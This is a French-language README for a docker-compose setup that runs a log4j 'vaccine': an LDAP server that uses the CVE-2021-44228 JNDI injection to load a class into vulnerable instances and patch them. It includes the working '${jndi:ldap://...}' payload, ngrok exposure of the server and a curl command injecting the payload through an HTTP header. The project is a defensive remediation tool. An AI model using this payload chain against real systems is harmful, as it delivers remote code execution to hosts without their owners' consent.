
Solution docker compose pour exécuter un environnement de vaccination contre la vulnérabilité log4j2 CVE-2021-44228
Une méthode conteneurisée pour exécuter le vaccin log4j proposé par Cyberreason
Clonez ce dépôt :
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git
Modifiez le fichier containers.env pour y mettre une IP/DNS privée ou publique correcte que votre cible peut atteindre. L'entrée par défaut ne fonctionnera probablement pas pour vous !
Construisez et lancez les conteneurs :
docker-compose -f docker-compose.yml -p vaccine up
Vous avez maintenant un serveur ldap à l'écoute qui servira la classe Log4jRCE pour inoculer une instance log4j vulnérable.
Vous pouvez exposer ceci à Internet (si vous le souhaitez) en utilisant ngrok.
ngrok tcp 1389
Vous pouvez envoyer une instance log4j vulnérable à ce serveur en utilisant la célèbre chaîne d'entrée jndi :
${jndi:ldap://<ngrokurlgoeshere>:1389/a}
Il existe une version volontairement vulnérable de log4j dans un conteneur disponible sur :
Vous pouvez suivre leurs instructions pour le démarrer et l'utiliser pour les tests :
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
Et déclencher l'inoculation via :
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'